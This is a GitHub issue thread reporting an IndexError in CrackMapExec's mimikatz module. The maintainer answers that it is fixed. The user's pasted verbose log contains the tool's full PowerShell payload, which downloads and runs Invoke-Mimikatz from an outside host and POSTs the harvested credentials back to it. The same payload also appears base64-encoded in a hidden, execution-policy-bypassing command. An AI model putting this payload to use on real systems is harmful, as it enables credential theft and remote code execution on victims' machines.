### ISSUE TITLE
IndexError: list index out of range with -M mimikatz -o COMMAND='privilege::debug'

### ISSUE THREAD

**Issue by dave5623** [byt3bl33d3r/CrackMapExec#123]
## Version
```
root@kali:~# crackmapexec -v
3.1.3 - 'Stoofvlees'
```
## Command string used
```
root@kali:~# crackmapexec  192.168.22.22 --verbose -u bdennis -p bdennis123 -M mimikatz -o COMMAND='privilege::debug'
```
## CME verbose output (using the --verbose flag)
```
08-03-2016 22:52:19 CME          192.168.22.22:445 WIN7            [*] Windows 6.1 Build 7600 (name:WIN7) (domain:ROCKFISHSEC)
08-03-2016 22:52:19 CME          192.168.22.22:445 WIN7            [+] ROCKFISHSEC\bdennis:bdennis123 (Pwn3d!)
08-03-2016 22:52:19 DEBUG                                          Payload:
        IEX (New-Object Net.WebClient).DownloadString('https://192.168.22.129:443/Invoke-Mimikatz.ps1');
        $creds = Invoke-fCiPVueWym -Command 'privilege::debug';
        $request = [System.Net.WebRequest]::Create('https://192.168.22.129:443/');
        $request.Method = 'POST';
        $request.ContentType = 'application/x-www-form-urlencoded';
        $bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
        $request.ContentLength = $bytes.Length;
        $requestStream = $request.GetRequestStream();
        $requestStream.Write( $bytes, 0, $bytes.Length );
        $requestStream.Close();
        $request.GetResponse();
08-03-2016 22:52:19 DEBUG                                          Target system is 192.168.22.22 and isFDQN is False
08-03-2016 22:52:19 DEBUG                                          StringBinding: \\\\WIN7[\\PIPE\\atsvc]
08-03-2016 22:52:19 DEBUG                                          StringBinding: WIN7[49154]
08-03-2016 22:52:19 DEBUG                                          StringBinding: 192.168.22.22[49154]
08-03-2016 22:52:19 DEBUG                                          StringBinding chosen: ncacn_ip_tcp:192.168.22.22[49154]
08-03-2016 22:52:20 DEBUG                                          Executed command via wmiexec
08-03-2016 22:52:20 DEBUG                                          Executing command: cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKACAAIAAgACAAIAAgACAAIABJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvADEAOQAyAC4AMQA2ADgALgAyADIALgAxADIAOQA6ADQANAAzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAKACAAIAAgACAAIAAgACAAIAAkAGMAcgBlAGQAcwAgAD0AIABJAG4AdgBvAGsAZQAtAGYAQwBpAFAAVgB1AGUAVwB5AG0AIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAJwA7AAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA5ADIALgAxADYAOAAuADIAMgAuADEAMgA5ADoANAA0ADMALwAnACkAOwAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwA7AAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcAOwAKACAAIAAgACAAIAAgACAAIAAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAcgBlAGQAcwApADsACgAgACAAIAAgACAAIAAgACAAJAByAGUAcQB1AGUAcwB0AC4AQwBvAG4AdABlAG4AdABMAGUAbgBnAHQAaAAgAD0AIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoADsACgAgACAAIAAgACAAIAAgACAAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtACAAPQAgACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsACgAgACAAIAAgACAAIAAgACAAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAIAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAAgACkAOwAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBDAGwAbwBzAGUAKAApADsACgAgACAAIAAgACAAIAAgACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7AA==
08-03-2016 22:52:20 MIMIKATZ     192.168.22.22:445 WIN7            [+] Executed payload
08-03-2016 22:52:20 MIMIKATZ                                       [*] Waiting on 1 host(s)
08-03-2016 22:52:35 MIMIKATZ                                       [*] Waiting on 1 host(s)
08-03-2016 22:52:37 MIMIKATZ     192.168.22.22                     [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
08-03-2016 22:52:44 MIMIKATZ     192.168.22.22                     [*] - - "POST / HTTP/1.1" 200 -
----------------------------------------
Exception happened during processing of request from ('192.168.22.22', 49282)
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock
    self.process_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
    self.handle()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle
    self.handle_one_request()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request
    method()
  File "/usr/local/lib/python2.7/dist-packages/crackmapexec-3.1.3-py2.7.egg/cme/cmeserver.py", line 29, in do_POST
    self.server.module.on_response(self.server.context, self)
  File "/usr/local/lib/python2.7/dist-packages/crackmapexec-3.1.3-py2.7.egg/cme/modules/mimikatz.py", line 209, in on_response
    creds = self.parse_mimikatz(data)
  File "/usr/local/lib/python2.7/dist-packages/crackmapexec-3.1.3-py2.7.egg/cme/modules/mimikatz.py", line 150, in parse_mimikatz
    if lines[x].startswith("Domain :"):
IndexError: list index out of range
----------------------------------------
08-03-2016 22:52:50 [*] KTHXBYE!
```
## OS
```
root@kali:~# cat /etc/issue
Kali GNU/Linux Rolling \n \l
```
## Target OS
`Windows 7 SP1 x64`
## Detailed issue explanation
Attempting to follow along the tutorial [here](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html) and experienced the Index Error while attempting to use mimikatz with the 'privilege::debug' command

**Comment by byt3bl33d3r** [comment]
Will be looking into this today, thanks for the report

**Comment by byt3bl33d3r** [comment]
Fixed in the newest version which will be released Friday.

**Comment by byt3bl33d3r** [comment]
Should be fixed in latest version, if not comment below
